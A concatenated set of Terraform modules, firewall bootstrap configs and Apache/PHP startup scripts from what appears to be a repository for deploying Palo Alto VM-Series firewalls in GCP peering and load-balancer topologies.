/gcp/adv_peering_2fw_2spoke/scripts/webserver-startup.sh:
--------------------------------------------------------------------------------
1 | #!/bin/bash
2 | until sudo apt-get update; do echo "Retrying"; sleep 2; done
3 | until sudo apt-get install -y php; do echo "Retrying"; sleep 2; done
4 | until sudo apt-get install -y apache2 php7. libapache2-mod-php7.; do echo "Retrying"; sleep 2; done
5 | until sudo rm -f /var/www/html/index.html; do echo "Retrying"; sleep 2; done
6 | until sudo wget -O /var/www/html/index.php https://raw.githubusercontent.com/wwce/terraform/master/gcp/adv_peering_2fw_2spoke/scripts/showheaders.php; do echo "Retrying"; sleep 2; done
7 | until sudo systemctl restart apache2; do echo "Retrying"; sleep 2; done
8 | 


--------------------------------------------------------------------------------
/gcp/adv_peering_2fw_2spoke_common/GUIDE.pdf:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/wwce/terraform/9aee9eadfb3b8102328460bd20f6eb280a33ae18/gcp/adv_peering_2fw_2spoke_common/GUIDE.pdf


--------------------------------------------------------------------------------
/gcp/adv_peering_2fw_2spoke_common/bootstrap_files/authcodes:
--------------------------------------------------------------------------------
1 |  


--------------------------------------------------------------------------------
/gcp/adv_peering_2fw_2spoke_common/bootstrap_files/init-cfg.txt:
--------------------------------------------------------------------------------
 1 | type=dhcp-client
 2 | ip-address=
 3 | default-gateway=
 4 | netmask=
 5 | ipv6-address=
 6 | ipv6-default-gateway=
 7 | dhcp-accept-server-hostname=yes
 8 | dns-primary=8.8.8.8
 9 | dns-secondary=4.2.2.2
10 | op-command-modes=mgmt-interface-swap


--------------------------------------------------------------------------------
/gcp/adv_peering_2fw_2spoke_common/images/diagram.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/wwce/terraform/9aee9eadfb3b8102328460bd20f6eb280a33ae18/gcp/adv_peering_2fw_2spoke_common/images/diagram.png


--------------------------------------------------------------------------------
/gcp/adv_peering_2fw_2spoke_common/images/tfvars.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/wwce/terraform/9aee9eadfb3b8102328460bd20f6eb280a33ae18/gcp/adv_peering_2fw_2spoke_common/images/tfvars.png


--------------------------------------------------------------------------------
/gcp/adv_peering_2fw_2spoke_common/modules/gcp_bootstrap/outputs.tf:
--------------------------------------------------------------------------------
1 | output completion {
2 |   value = null_resource.dependency_setter.id
3 | }
4 | 
5 | output bucket_name {
6 |   value = google_storage_bucket.bootstrap.name
7 | }
8 | 
9 | 


--------------------------------------------------------------------------------
/gcp/adv_peering_2fw_2spoke_common/modules/gcp_bootstrap/variables.tf:
--------------------------------------------------------------------------------
 1 | variable bucket_name {
 2 | }
 3 | 
 4 | variable file_location {
 5 | }
 6 | 
 7 | variable config {
 8 |   type    = list(string)
 9 |   default = []
10 | }
11 | 
12 | variable content {
13 |   type    = list(string)
14 |   default = []
15 | }
16 | 
17 | variable license {
18 |   type    = list(string)
19 |   default = []
20 | }
21 | 
22 | variable software {
23 |   default = []
24 | }
25 | 
26 | variable location {
27 |   default = "US"
28 | }
29 | 


--------------------------------------------------------------------------------
/gcp/adv_peering_2fw_2spoke_common/modules/lb_tcp_external/outputs.tf:
--------------------------------------------------------------------------------
1 | output forwarding_rule {
2 |   value = google_compute_forwarding_rule.default.*.self_link
3 | }
4 | 
5 | output forwarding_rule_ip_address {
6 |   value = google_compute_forwarding_rule.default.ip_address
7 | }


--------------------------------------------------------------------------------
/gcp/adv_peering_2fw_2spoke_common/modules/lb_tcp_internal/outputs.tf:
--------------------------------------------------------------------------------
1 | output forwarding_rule {
2 |   value = google_compute_forwarding_rule.default.*.self_link
3 | }
4 | 
5 | 


--------------------------------------------------------------------------------
/gcp/adv_peering_2fw_2spoke_common/modules/lb_tcp_internal/variables.tf:
--------------------------------------------------------------------------------
 1 | variable name {
 2 | }
 3 | 
 4 | variable health_check_port {
 5 |   default = "22"
 6 | }
 7 | 
 8 | variable backends {
 9 |   description = "Map backend indices to list of backend maps."
10 |   type = map(list(object({
11 |     group    = string
12 |     failover = bool
13 |   })))
14 | }
15 | 
16 | variable subnetworks {
17 |   type = list(string)
18 | }
19 | 
20 | variable ip_address {
21 |   default = null
22 | }
23 | 
24 | variable ip_protocol {
25 |   default = "TCP"
26 | }
27 | variable all_ports {
28 |   type = bool
29 | }
30 | variable ports {
31 |   type    = list(string)
32 |   default = []
33 | }
34 | 
35 | variable network {
36 |   default = null
37 | }


--------------------------------------------------------------------------------
/gcp/adv_peering_2fw_2spoke_common/modules/vm/outputs.tf:
--------------------------------------------------------------------------------
 1 | output vm_names {
 2 |   value = google_compute_instance.default.*.name
 3 | }
 4 | 
 5 | output vm_self_link {
 6 |   value = google_compute_instance.default.*.self_link
 7 | }
 8 | 
 9 | output instance_group {
10 |   value = google_compute_instance_group.default.*.self_link
11 | }
12 | 


--------------------------------------------------------------------------------
/gcp/adv_peering_2fw_2spoke_common/modules/vm/variables.tf:
--------------------------------------------------------------------------------
 1 | variable names {
 2 |   type = list(string)
 3 | }
 4 | 
 5 | variable machine_type {
 6 | }
 7 | variable create_instance_group {
 8 |   type    = bool
 9 |   default = false
10 | }
11 | 
12 | variable instance_group_names {
13 |   type    = list(string)
14 |   default = ["vmseries-instance-group"]
15 | }
16 | variable zones {
17 |   type = list(string)
18 | }
19 | variable ssh_key {
20 |   default = ""
21 | }
22 | variable image {
23 | }
24 | 
25 | variable subnetworks {
26 |   type = list(string)
27 | }
28 | 
29 | variable scopes {
30 |   type = list(string)
31 | 
32 |   default = [
33 |     "https://www.googleapis.com/auth/cloud.useraccounts.readonly",
34 |     "https://www.googleapis.com/auth/devstorage.read_only",
35 |     "https://www.googleapis.com/auth/logging.write",
36 |     "https://www.googleapis.com/auth/monitoring.write",
37 |   ]
38 | }
39 | 
40 | variable startup_script {
41 |   default = ""
42 | }
43 | 
44 | 


--------------------------------------------------------------------------------
/gcp/adv_peering_2fw_2spoke_common/modules/vmseries/outputs.tf:
--------------------------------------------------------------------------------
 1 | output vm_names {
 2 |   value = google_compute_instance.vmseries.*.name
 3 | }
 4 | 
 5 | output vm_self_link {
 6 |   value = google_compute_instance.vmseries.*.self_link
 7 | }
 8 | 
 9 | output instance_group {
10 |   value = google_compute_instance_group.vmseries.*.self_link
11 | }
12 | 
13 | output nic0_public_ip {
14 |   value = var.nic0_public_ip ? google_compute_instance.vmseries.*.network_interface.0.access_config.0.nat_ip : []
15 | }
16 | 
17 | output nic1_public_ip {
18 |   value = var.nic1_public_ip ? google_compute_instance.vmseries.*.network_interface.1.access_config.0.nat_ip : []
19 | }
20 | 
21 | output nic2_public_ip {
22 |   value = var.nic2_public_ip ? google_compute_instance.vmseries.*.network_interface.2.access_config.0.nat_ip : []
23 | }
24 | 
25 | 


--------------------------------------------------------------------------------
/gcp/adv_peering_2fw_2spoke_common/modules/vpc/main.tf:
--------------------------------------------------------------------------------
 1 | resource "google_compute_network" "default" {
 2 |   name                            = var.vpc
 3 |   delete_default_routes_on_create = var.delete_default_route
 4 |   auto_create_subnetworks         = false
 5 | }
 6 | 
 7 | resource "google_compute_subnetwork" "default" {
 8 |   count         = length(var.subnets)
 9 |   name          = element(var.subnets, count.index)
10 |   ip_cidr_range = element(var.cidrs, count.index)
11 |   region        = element(var.regions, count.index)
12 |   network       = google_compute_network.default.self_link
13 | }
14 | 
15 | resource "google_compute_firewall" "default" {
16 |   count         = length(var.allowed_sources) != 0 ? 1 : 0
17 |   name          = "${google_compute_network.default.name}-ingress"
18 |   network       = google_compute_network.default.self_link
19 |   direction     = "INGRESS"
20 |   source_ranges = var.allowed_sources
21 | 
22 |   allow {
23 |     protocol = var.allowed_protocol
24 |     ports    = var.allowed_ports
25 |   }
26 | }
27 | 
28 | 


--------------------------------------------------------------------------------
/gcp/adv_peering_2fw_2spoke_common/modules/vpc/outputs.tf:
--------------------------------------------------------------------------------
 1 | output subnetwork_id {
 2 |   value = google_compute_subnetwork.default.*.id
 3 | }
 4 | 
 5 | output subnetwork_name {
 6 |   value = google_compute_subnetwork.default.*.name
 7 | }
 8 | 
 9 | output subnetwork_self_link {
10 |   value = google_compute_subnetwork.default.*.self_link
11 | }
12 | 
13 | output vpc_name {
14 |   value = google_compute_network.default.*.name
15 | }
16 | 
17 | output vpc_id {
18 |   value = google_compute_network.default.*.id[0]
19 | }
20 | 
21 | output vpc_self_link {
22 |   value = google_compute_network.default.*.self_link[0]
23 | }
24 | 
25 | 


--------------------------------------------------------------------------------
/gcp/adv_peering_2fw_2spoke_common/modules/vpc/variables.tf:
--------------------------------------------------------------------------------
 1 | variable vpc {
 2 | }
 3 | 
 4 | variable subnets {
 5 |   type = list(string)
 6 | }
 7 | 
 8 | variable cidrs {
 9 |   type = list(string)
10 | }
11 | 
12 | variable regions {
13 |   type = list(string)
14 | }
15 | 
16 | variable allowed_sources {
17 |   type    = list(string)
18 |   default = []
19 | }
20 | 
21 | variable allowed_protocol {
22 |   default = "all"
23 | }
24 | 
25 | variable allowed_ports {
26 |   type    = list(string)
27 |   default = []
28 | }
29 | 
30 | variable delete_default_route {
31 |   default = "false"
32 | }
33 | 
34 | 


--------------------------------------------------------------------------------
/gcp/adv_peering_2fw_2spoke_common/project.tf:
--------------------------------------------------------------------------------
 1 | terraform {
 2 |   required_version = ">= 0.12"
 3 | }
 4 | 
 5 | provider "google" {
 6 |   #credentials = var.auth_file
 7 |   project     = var.project_id
 8 |   region      = var.regions[0]
 9 | }
10 | 
11 | data "google_compute_zones" "available" {}
12 | 


--------------------------------------------------------------------------------
/gcp/adv_peering_2fw_2spoke_common/scripts/webserver-startup.sh:
--------------------------------------------------------------------------------
 1 | #!/bin/bash
 2 | sleep 120;
 3 | until sudo apt-get update; do echo "Retrying"; sleep 5; done
 4 | until sudo apt-get install -y php; do echo "Retrying"; sleep 5; done
 5 | until sudo apt-get install -y apache2; do echo "Retrying"; sleep 5; done
 6 | until sudo apt-get install -y libapache2-mod-php; do echo "Retrying"; sleep 5; done
 7 | until sudo rm -f /var/www/html/index.html; do echo "Retrying"; sleep 5; done
 8 | until sudo wget -O /var/www/html/index.php https://raw.githubusercontent.com/wwce/terraform/master/gcp/adv_peering_2fw_2spoke_common/scripts/showheaders.php; do echo "Retrying"; sleep 2; done
 9 | until sudo systemctl restart apache2; do echo "Retrying"; sleep 5; done
10 | 


--------------------------------------------------------------------------------
/gcp/adv_peering_4fw_2spoke/bootstrap_files/fw_inbound/authcodes:
--------------------------------------------------------------------------------
1 |  


--------------------------------------------------------------------------------
/gcp/adv_peering_4fw_2spoke/bootstrap_files/fw_inbound/init-cfg.txt:
--------------------------------------------------------------------------------
 1 | type=dhcp-client
 2 | ip-address=
 3 | default-gateway=
 4 | netmask=
 5 | ipv6-address=
 6 | ipv6-default-gateway=
 7 | dhcp-accept-server-hostname=yes
 8 | dns-primary=8.8.8.8
 9 | dns-secondary=4.2.2.2
10 | op-command-modes=mgmt-interface-swap


--------------------------------------------------------------------------------
/gcp/adv_peering_4fw_2spoke/bootstrap_files/fw_outbound/authcodes:
--------------------------------------------------------------------------------
1 |  


--------------------------------------------------------------------------------
/gcp/adv_peering_4fw_2spoke/bootstrap_files/fw_outbound/init-cfg.txt:
--------------------------------------------------------------------------------
 1 | type=dhcp-client
 2 | ip-address=
 3 | default-gateway=
 4 | netmask=
 5 | ipv6-address=
 6 | ipv6-default-gateway=
 7 | dhcp-accept-server-hostname=yes
 8 | dns-primary=8.8.8.8
 9 | dns-secondary=4.2.2.2
10 | op-command-modes=mgmt-interface-swap


--------------------------------------------------------------------------------
/gcp/adv_peering_4fw_2spoke/diagram.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/wwce/terraform/9aee9eadfb3b8102328460bd20f6eb280a33ae18/gcp/adv_peering_4fw_2spoke/diagram.png


--------------------------------------------------------------------------------
/gcp/adv_peering_4fw_2spoke/guide.pdf:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/wwce/terraform/9aee9eadfb3b8102328460bd20f6eb280a33ae18/gcp/adv_peering_4fw_2spoke/guide.pdf


--------------------------------------------------------------------------------
/gcp/adv_peering_4fw_2spoke/modules/gcp_bootstrap/outputs.tf:
--------------------------------------------------------------------------------
1 | output "completion" {
2 |   value = null_resource.dependency_setter.id
3 | }
4 | 
5 | output "bucket_name" {
6 |   value = google_storage_bucket.bootstrap.name
7 | }
8 | 
9 | 


--------------------------------------------------------------------------------
/gcp/adv_peering_4fw_2spoke/modules/gcp_bootstrap/variables.tf:
--------------------------------------------------------------------------------
 1 | variable "bucket_name" {
 2 | }
 3 | 
 4 | variable "file_location" {
 5 | }
 6 | 
 7 | variable "config" {
 8 |   type    = list(string)
 9 |   default = []
10 | }
11 | 
12 | variable "content" {
13 |   type    = list(string)
14 |   default = []
15 | }
16 | 
17 | variable "license" {
18 |   type    = list(string)
19 |   default = []
20 | }
21 | 
22 | variable "software" {
23 |   default = []
24 | }
25 | 


--------------------------------------------------------------------------------
/gcp/adv_peering_4fw_2spoke/modules/glb/outputs.tf:
--------------------------------------------------------------------------------
1 | output "address" {
2 |   value = google_compute_global_address.default.address
3 | }
4 | 
5 | 


--------------------------------------------------------------------------------
/gcp/adv_peering_4fw_2spoke/modules/ilb/outputs.tf:
--------------------------------------------------------------------------------
1 | output "forwarding_rule" {
2 |   value = google_compute_forwarding_rule.default.*.self_link
3 | }
4 | 
5 | 


--------------------------------------------------------------------------------
/gcp/adv_peering_4fw_2spoke/modules/ilb/variables.tf:
--------------------------------------------------------------------------------
 1 | variable "name" {
 2 | }
 3 | 
 4 | variable "health_check_port" {
 5 |   default = "22"
 6 | }
 7 | 
 8 | variable "backends" {
 9 |   description = "Map backend indices to list of backend maps."
10 |   type = map(list(object({
11 |     group    = string
12 |     failover = bool
13 |   })))
14 | }
15 | 
16 | variable "subnetworks" {
17 |   type = list(string)
18 | }
19 | 
20 | variable "ip_address" {
21 |   default = null
22 | }
23 | 
24 | variable "ip_protocol" {
25 |   default = "TCP"
26 | }
27 | variable "all_ports" {
28 |   type = bool
29 | }
30 | variable "ports" {
31 |   type    = list(string)
32 |   default = []
33 | }
34 | 


--------------------------------------------------------------------------------
/gcp/adv_peering_4fw_2spoke/modules/vm/outputs.tf:
--------------------------------------------------------------------------------
 1 | output "vm_names" {
 2 |   value = google_compute_instance.default.*.name
 3 | }
 4 | 
 5 | output "vm_self_link" {
 6 |   value = google_compute_instance.default.*.self_link
 7 | }
 8 | 
 9 | output "instance_group" {
10 |   value = google_compute_instance_group.default.*.self_link
11 | }
12 | 


--------------------------------------------------------------------------------
/gcp/adv_peering_4fw_2spoke/modules/vm/variables.tf:
--------------------------------------------------------------------------------
 1 | variable "names" {
 2 |   type = list(string)
 3 | }
 4 | 
 5 | variable "machine_type" {
 6 | }
 7 | variable "create_instance_group" {
 8 |   type    = bool
 9 |   default = false
10 | }
11 | 
12 | variable "instance_group_names" {
13 |   type    = list(string)
14 |   default = ["vmseries-instance-group"]
15 | }
16 | variable "zones" {
17 |   type = list(string)
18 | }
19 | variable "ssh_key" {
20 |   default = ""
21 | }
22 | variable "image" {
23 | }
24 | 
25 | variable "subnetworks" {
26 |   type = list(string)
27 | }
28 | 
29 | variable "scopes" {
30 |   type = list(string)
31 | 
32 |   default = [
33 |     "https://www.googleapis.com/auth/cloud.useraccounts.readonly",
34 |     "https://www.googleapis.com/auth/devstorage.read_only",
35 |     "https://www.googleapis.com/auth/logging.write",
36 |     "https://www.googleapis.com/auth/monitoring.write",
37 |   ]
38 | }
39 | 
40 | variable "startup_script" {
41 |   default = ""
42 | }
43 | 
44 | 


--------------------------------------------------------------------------------
/gcp/adv_peering_4fw_2spoke/modules/vmseries/outputs.tf:
--------------------------------------------------------------------------------
 1 | output "vm_names" {
 2 |   value = google_compute_instance.vmseries.*.name
 3 | }
 4 | 
 5 | output "vm_self_link" {
 6 |   value = google_compute_instance.vmseries.*.self_link
 7 | }
 8 | 
 9 | output "instance_group" {
10 |   value = google_compute_instance_group.vmseries.*.self_link
11 | }
12 | 
13 | output "nic0_public_ip" {
14 |   value = var.nic0_public_ip ? google_compute_instance.vmseries.*.network_interface.0.access_config.0.nat_ip : []
15 | }
16 | 
17 | output "nic1_public_ip" {
18 |   value = var.nic1_public_ip ? google_compute_instance.vmseries.*.network_interface.1.access_config.0.nat_ip : []
19 | }
20 | 
21 | output "nic2_public_ip" {
22 |   value = var.nic2_public_ip ? google_compute_instance.vmseries.*.network_interface.2.access_config.0.nat_ip : []
23 | }
24 | 
25 | 


--------------------------------------------------------------------------------
/gcp/adv_peering_4fw_2spoke/modules/vpc/main.tf:
--------------------------------------------------------------------------------
 1 | resource "google_compute_network" "default" {
 2 |   name                            = var.vpc
 3 |   delete_default_routes_on_create = var.delete_default_route
 4 |   auto_create_subnetworks         = false
 5 | }
 6 | 
 7 | resource "google_compute_subnetwork" "default" {
 8 |   count         = length(var.subnets)
 9 |   name          = element(var.subnets, count.index)
10 |   ip_cidr_range = element(var.cidrs, count.index)
11 |   region        = element(var.regions, count.index)
12 |   network       = google_compute_network.default.self_link
13 | }
14 | 
15 | resource "google_compute_firewall" "default" {
16 |   count         = length(var.allowed_sources) != 0 ? 1 : 0
17 |   name          = "${google_compute_network.default.name}-ingress"
18 |   network       = google_compute_network.default.self_link
19 |   direction     = "INGRESS"
20 |   source_ranges = var.allowed_sources
21 | 
22 |   allow {
23 |     protocol = var.allowed_protocol
24 |     ports    = var.allowed_ports
25 |   }
26 | }
27 | 
28 | 


--------------------------------------------------------------------------------
/gcp/adv_peering_4fw_2spoke/modules/vpc/outputs.tf:
--------------------------------------------------------------------------------
 1 | output "subnetwork_id" {
 2 |   value = google_compute_subnetwork.default.*.id
 3 | }
 4 | 
 5 | output "subnetwork_name" {
 6 |   value = google_compute_subnetwork.default.*.name
 7 | }
 8 | 
 9 | output "subnetwork_self_link" {
10 |   value = google_compute_subnetwork.default.*.self_link
11 | }
12 | 
13 | output "vpc_name" {
14 |   value = google_compute_network.default.*.name
15 | }
16 | 
17 | output "vpc_id" {
18 |   value = google_compute_network.default.*.id[0]
19 | }
20 | 
21 | output "vpc_self_link" {
22 |   value = google_compute_network.default.*.self_link[0]
23 | }
24 | 
25 | 


--------------------------------------------------------------------------------
/gcp/adv_peering_4fw_2spoke/modules/vpc/variables.tf:
--------------------------------------------------------------------------------
 1 | variable "vpc" {
 2 | }
 3 | 
 4 | variable "subnets" {
 5 |   type = list(string)
 6 | }
 7 | 
 8 | variable "cidrs" {
 9 |   type = list(string)
10 | }
11 | 
12 | variable "regions" {
13 |   type = list(string)
14 | }
15 | 
16 | variable "allowed_sources" {
17 |   type    = list(string)
18 |   default = []
19 | }
20 | 
21 | variable "allowed_protocol" {
22 |   default = "all"
23 | }
24 | 
25 | variable "allowed_ports" {
26 |   type    = list(string)
27 |   default = []
28 | }
29 | 
30 | variable "delete_default_route" {
31 |   default = "false"
32 | }
33 | 
34 | 


--------------------------------------------------------------------------------
/gcp/adv_peering_4fw_2spoke/outputs.tf:
--------------------------------------------------------------------------------
 1 | #-----------------------------------------------------------------------------------------------
 2 | # Outputs
 3 | output "GLB-ADDR" {
 4 |   value = "http://${module.glb.address}"
 5 | }
 6 | 
 7 | output "MGMT-FW1" {
 8 |   value = "https://${module.fw_inbound.nic1_public_ip[0]}"
 9 | }
10 | 
11 | output "MGMT-FW2" {
12 |   value = "https://${module.fw_inbound.nic1_public_ip[1]}"
13 | }
14 | 
15 | output "MGMT-FW3" {
16 |   value = "https://${module.fw_outbound.nic1_public_ip[0]}"
17 | }
18 | 
19 | output "MGMT-FW4" {
20 |   value = "https://${module.fw_outbound.nic1_public_ip[1]}"
21 | }
22 | 
23 | output "SSH-TO-SPOKE1" {
24 |   value = "ssh ${var.spoke_user}@${module.fw_inbound.nic0_public_ip[0]} -p 221 -i ${replace(var.public_key_path, ".pub", "")}"
25 | }
26 | 
27 | output "SSH-TO-SPOKE2" {
28 |   value = "ssh ${var.spoke_user}@${module.fw_inbound.nic0_public_ip[0]} -p 222 -i ${replace(var.public_key_path, ".pub", "")}"
29 | }
30 | 
31 | 


--------------------------------------------------------------------------------
/gcp/adv_peering_4fw_2spoke/project.tf:
--------------------------------------------------------------------------------
 1 | terraform {
 2 |   required_version = ">= 0.12"
 3 | }
 4 | 
 5 | provider "google" {
 6 |  # credentials = var.auth_file
 7 |   project     = var.project_id
 8 |   region      = var.region
 9 | }
10 | 
11 | provider "google-beta" {
12 |  # credentials = var.auth_file
13 |   project     = var.project_id
14 |   region      = var.region
15 |   version     = "> 2.13.0"
16 | }
17 | 
18 | data "google_compute_zones" "available" {}


--------------------------------------------------------------------------------
/gcp/adv_peering_4fw_2spoke/scripts/webserver-startup.sh:
--------------------------------------------------------------------------------
1 | #!/bin/bash
2 | until sudo apt-get update; do echo "Retrying"; sleep 2; done
3 | until sudo apt-get install -y php; do echo "Retrying"; sleep 2; done
4 | until sudo apt-get install -y apache2; do echo "Retrying"; sleep 2; done
5 | until sudo apt-get install -y libapache2-mod-php; do echo "Retrying"; sleep 2; done
6 | until sudo rm -f /var/www/html/index.html; do echo "Retrying"; sleep 2; done
7 | until sudo wget -O /var/www/html/index.php https://raw.githubusercontent.com/wwce/terraform/master/gcp/adv_peering_4fw_2spoke/scripts/showheaders.php; do echo "Retrying"; sleep 2; done
8 | until sudo systemctl restart apache2; do echo "Retrying"; sleep 2; done


--------------------------------------------------------------------------------
/gcp/gcp-ilbnh/bootstrap_files_ilbnh/authcodes:
--------------------------------------------------------------------------------
1 |  


--------------------------------------------------------------------------------
/gcp/gcp-ilbnh/bootstrap_files_ilbnh/init-cfg.txt:
--------------------------------------------------------------------------------
 1 | type=dhcp-client
 2 | ip-address=
 3 | default-gateway=
 4 | netmask=
 5 | ipv6-address=
 6 | ipv6-default-gateway=
 7 | dhcp-accept-server-hostname=yes
 8 | dns-primary=8.8.8.8
 9 | dns-secondary=4.2.2.2
10 | op-command-modes=mgmt-interface-swap


--------------------------------------------------------------------------------
/gcp/gcp-ilbnh/ilbnh_override.tf:
--------------------------------------------------------------------------------
1 | #************************************************************************************
2 | # ILBNH
3 | #************************************************************************************
4 | variable "enable_ilbnh" {
5 |   description = "If set to true, enable ILB as Next Hop"
6 |   default     = true
7 | }
8 | 


--------------------------------------------------------------------------------
/gcp/ilbnh-mig/bootstrap_files/authcodes:
--------------------------------------------------------------------------------
1 |  


--------------------------------------------------------------------------------
/gcp/ilbnh-mig/bootstrap_files/init-cfg.txt:
--------------------------------------------------------------------------------
 1 | type=dhcp-client
 2 | ip-address=
 3 | default-gateway=
 4 | netmask=
 5 | ipv6-address=
 6 | ipv6-default-gateway=
 7 | hostname=packet-mirroring
 8 | op-command-modes=mgmt-interface-swap
 9 | dns-primary=
10 | dns-secondary=


--------------------------------------------------------------------------------
/gcp/ilbnh-mig/images/curl.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/wwce/terraform/9aee9eadfb3b8102328460bd20f6eb280a33ae18/gcp/ilbnh-mig/images/curl.png


--------------------------------------------------------------------------------
/gcp/ilbnh-mig/images/deployment.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/wwce/terraform/9aee9eadfb3b8102328460bd20f6eb280a33ae18/gcp/ilbnh-mig/images/deployment.png


--------------------------------------------------------------------------------
/gcp/ilbnh-mig/images/directory.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/wwce/terraform/9aee9eadfb3b8102328460bd20f6eb280a33ae18/gcp/ilbnh-mig/images/directory.png


--------------------------------------------------------------------------------
/gcp/ilbnh-mig/images/fwlogs.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/wwce/terraform/9aee9eadfb3b8102328460bd20f6eb280a33ae18/gcp/ilbnh-mig/images/fwlogs.png


--------------------------------------------------------------------------------
/gcp/ilbnh-mig/modules/gcp_bootstrap/outputs.tf:
--------------------------------------------------------------------------------
1 | output completion {
2 |   value = null_resource.dependency_setter.id
3 | }
4 | 
5 | output bucket_name {
6 |   value = google_storage_bucket.bootstrap.name
7 | }
8 | 
9 | 


--------------------------------------------------------------------------------
/gcp/ilbnh-mig/modules/gcp_bootstrap/variables.tf:
--------------------------------------------------------------------------------
 1 | variable bucket_name {
 2 | }
 3 | 
 4 | variable file_location {
 5 | }
 6 | 
 7 | variable config {
 8 |   type    = list(string)
 9 |   default = []
10 | }
11 | 
12 | variable content {
13 |   type    = list(string)
14 |   default = []
15 | }
16 | 
17 | variable license {
18 |   type    = list(string)
19 |   default = []
20 | }
21 | 
22 | variable software {
23 |   default = []
24 | }
25 | 


--------------------------------------------------------------------------------
/gcp/ilbnh-mig/modules/ilbnh/outputs.tf:
--------------------------------------------------------------------------------
1 | output forwarding_rule {
2 |   value = google_compute_forwarding_rule.default.self_link
3 | }


--------------------------------------------------------------------------------
/gcp/ilbnh-mig/modules/ilbnh/variables.tf:
--------------------------------------------------------------------------------
 1 | variable project_id {
 2 | }
 3 | 
 4 | variable region {
 5 | }
 6 | 
 7 | variable name {
 8 | }
 9 | 
10 | variable health_checks {
11 |   type    = list(string)
12 |   default = []
13 | }
14 | 
15 | variable group {
16 | }
17 | 
18 | variable subnetwork {
19 | }
20 | 
21 | variable ip_address {
22 |   default = null
23 | }
24 | 
25 | variable ip_protocol {
26 |   default = "TCP"
27 | }
28 | variable all_ports {
29 |   type = bool
30 | }
31 | variable ports {
32 |   type    = list(string)
33 |   default = []
34 | }
35 | 
36 | variable network {
37 |   default = null
38 | }
39 | 
40 | variable network_uri {
41 | }


--------------------------------------------------------------------------------
/gcp/ilbnh-mig/modules/vm/main.tf:
--------------------------------------------------------------------------------
 1 | resource "google_compute_instance" "default" {
 2 |   count                     = length(var.names)
 3 |   name                      = element(var.names, count.index)
 4 |   machine_type              = var.machine_type
 5 |   zone                      = element(var.zones, count.index)
 6 |   can_ip_forward            = false
 7 |   allow_stopping_for_update = true
 8 |   metadata_startup_script   = var.startup_script
 9 | 
10 |   metadata = {
11 |     serial-port-enable = true
12 |     ssh-keys           = var.ssh_key
13 |   }
14 | 
15 |   network_interface {
16 |     dynamic "access_config" {
17 |       for_each = var.server_public_ip ? [""] : []
18 |       content {}
19 |     }
20 |     subnetwork = element(var.subnetworks, count.index)
21 |     network_ip = element(var.server_ips, count.index)
22 | 
23 |   }
24 | 
25 |   boot_disk {
26 |     initialize_params {
27 |       image = var.image
28 |     }
29 |   }
30 | 
31 |   service_account {
32 |     scopes = var.scopes
33 |   }
34 | }


--------------------------------------------------------------------------------
/gcp/ilbnh-mig/modules/vm/outputs.tf:
--------------------------------------------------------------------------------
1 | output vm_names {
2 |   value = google_compute_instance.default.*.name
3 | }
4 | 
5 | output vm_self_link {
6 |   value = google_compute_instance.default.*.self_link
7 | }


--------------------------------------------------------------------------------
/gcp/ilbnh-mig/modules/vm/variables.tf:
--------------------------------------------------------------------------------
 1 | variable names {
 2 |   type = list(string)
 3 | }
 4 | 
 5 | variable machine_type {
 6 | }
 7 | 
 8 | variable zones {
 9 |   type = list(string)
10 | }
11 | variable ssh_key {
12 |   default = ""
13 | }
14 | variable image {
15 | }
16 | 
17 | variable subnetworks {
18 |   type = list(string)
19 | }
20 | 
21 | variable server_ips {
22 |   type = list(string)
23 | }
24 | 
25 | variable scopes {
26 |   type = list(string)
27 | 
28 |   default = [
29 |     "https://www.googleapis.com/auth/cloud.useraccounts.readonly",
30 |     "https://www.googleapis.com/auth/devstorage.read_only",
31 |     "https://www.googleapis.com/auth/logging.write",
32 |     "https://www.googleapis.com/auth/monitoring.write",
33 |   ]
34 | }
35 | 
36 | variable startup_script {
37 |   default = ""
38 | }
39 | 
40 | variable server_public_ip {
41 |   type    = bool
42 |   default = false
43 | }
44 | 
45 | 


--------------------------------------------------------------------------------
/gcp/ilbnh-mig/modules/vmseries/outputs.tf:
--------------------------------------------------------------------------------
1 | output vmseries_rigm {
2 |   value = google_compute_region_instance_group_manager.vmseries_rigm.instance_group
3 | }


--------------------------------------------------------------------------------
/gcp/ilbnh-mig/modules/vpc/main.tf:
--------------------------------------------------------------------------------
 1 | resource "google_compute_network" "default" {
 2 |   name                            = var.vpc
 3 |   delete_default_routes_on_create = var.delete_default_route
 4 |   auto_create_subnetworks         = false
 5 | }
 6 | 
 7 | resource "google_compute_subnetwork" "default" {
 8 |   name          = var.subnet
 9 |   ip_cidr_range = var.cidr
10 |   region        = var.region
11 |   network       = google_compute_network.default.self_link
12 | }
13 | 
14 | resource "google_compute_firewall" "default" {
15 |   count         = length(var.allowed_sources) != 0 ? 1 : 0
16 |   name          = "${google_compute_network.default.name}-ingress"
17 |   network       = google_compute_network.default.self_link
18 |   direction     = "INGRESS"
19 |   source_ranges = var.allowed_sources
20 | 
21 |   allow {
22 |     protocol = var.allowed_protocol
23 |     ports    = var.allowed_ports
24 |   }
25 | }


--------------------------------------------------------------------------------
/gcp/ilbnh-mig/modules/vpc/outputs.tf:
--------------------------------------------------------------------------------
 1 | output network_self_link {
 2 | #  value = google_compute_network.default.*.self_link
 3 |   value = google_compute_network.default.self_link
 4 | }
 5 | 
 6 | output subnetwork_id {
 7 |   value = google_compute_subnetwork.default.*.id
 8 | }
 9 | 
10 | output subnetwork_name {
11 |   value = google_compute_subnetwork.default.*.name
12 | }
13 | 
14 | output subnetwork_self_link {
15 | #  value = google_compute_subnetwork.default.*.self_link
16 |   value = google_compute_subnetwork.default.self_link
17 | }
18 | 
19 | output vpc_name {
20 |   value = google_compute_network.default.*.name
21 | }
22 | 
23 | output vpc_id {
24 |   value = google_compute_network.default.*.id[0]
25 | }
26 | 
27 | output vpc_self_link {
28 |   value = google_compute_network.default.*.self_link[0]
29 | }


--------------------------------------------------------------------------------
/gcp/ilbnh-mig/modules/vpc/variables.tf:
--------------------------------------------------------------------------------
 1 | variable vpc {
 2 | }
 3 | 
 4 | variable subnet {
 5 | }
 6 | 
